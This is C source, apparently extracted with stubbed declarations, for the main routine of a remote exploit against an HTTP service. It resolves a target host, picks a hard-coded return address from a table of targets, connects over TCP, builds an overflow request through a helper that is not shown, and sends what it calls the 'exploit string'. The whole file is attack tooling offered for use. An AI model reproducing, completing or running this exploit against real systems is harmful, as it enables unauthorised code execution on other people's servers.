
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int u_short ;
struct in_addr {int dummy; } ;
struct sockaddr_in {int sin_port; int sin_family; struct in_addr sin_addr; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
typedef int sin ;
struct TYPE_2__ {unsigned long ret; } ;


 int AF_INET ;
 int BUFF_SIZE ;
 int IPPROTO_TCP ;
 unsigned int MAX_ARCH ;
 int SOCK_STREAM ;
 void* atoi (char*) ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int exit (int) ;
 struct hostent* gethostbyname (char*) ;
 int htons (int ) ;
 int make_http_request (char*,int ,char*,unsigned long*) ;
 scalar_t__ malloc (int ) ;
 int perror (char*) ;
 int printf (char*,...) ;
 scalar_t__ send (int,char*,scalar_t__,int ) ;
 int show_help (char*,int) ;
 int socket (int ,int ,int ) ;
 scalar_t__ strlen (char*) ;
 TYPE_1__* targets ;

int main(int argc,char *argv[]) {
char *host;
char *b;
int rport;
int sockfd;
struct sockaddr_in sin;
struct hostent *h;
unsigned int n;
unsigned long magic;
if(argc != 4) {
show_help(argv[0],1);
exit(1);
}
host=argv[1];
rport=(atoi(argv[2]));
n=atoi(argv[3]);
if((n >= MAX_ARCH)||(n<0)) {
printf("- Invalid target\n");
show_help(argv[0],1);
exit(1);
}
magic=targets[n].ret;
show_help(argv[0],0);
printf("-Using RET %p\n",magic);
printf("Resolving %s\t",host);
h=gethostbyname(host);
if(!h) {
printf("[ERROR]\nUnable to resolve: %s\n",host);
exit(1);
}
else
printf("[DONE]\n");
b=(char*)malloc(BUFF_SIZE);
if(!b) {
perror("malloc");
exit(1);
}
sin.sin_addr=*((struct in_addr*)h->h_addr);
sin.sin_family=AF_INET;
sin.sin_port=htons((u_short)rport);
if((sockfd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0){
perror("socket");
exit(1);
}
printf("Connecting to %s:%d\t",host,rport);
if(connect(sockfd,(struct sockaddr*)&sin,sizeof(sin))<0) {
printf("[ERROR]\nUnable to connect: %s:%d\n",host,rport);
perror("connect");
exit(1);
}
else
printf("[DONE]\n");
make_http_request(b,BUFF_SIZE,host,&magic);
if(send(sockfd,b,strlen(b),0) == strlen(b))
printf("Successfully send exploit string\n");
else
printf("Failed sending exploit string\n");
close(sockfd);
return 0;
}
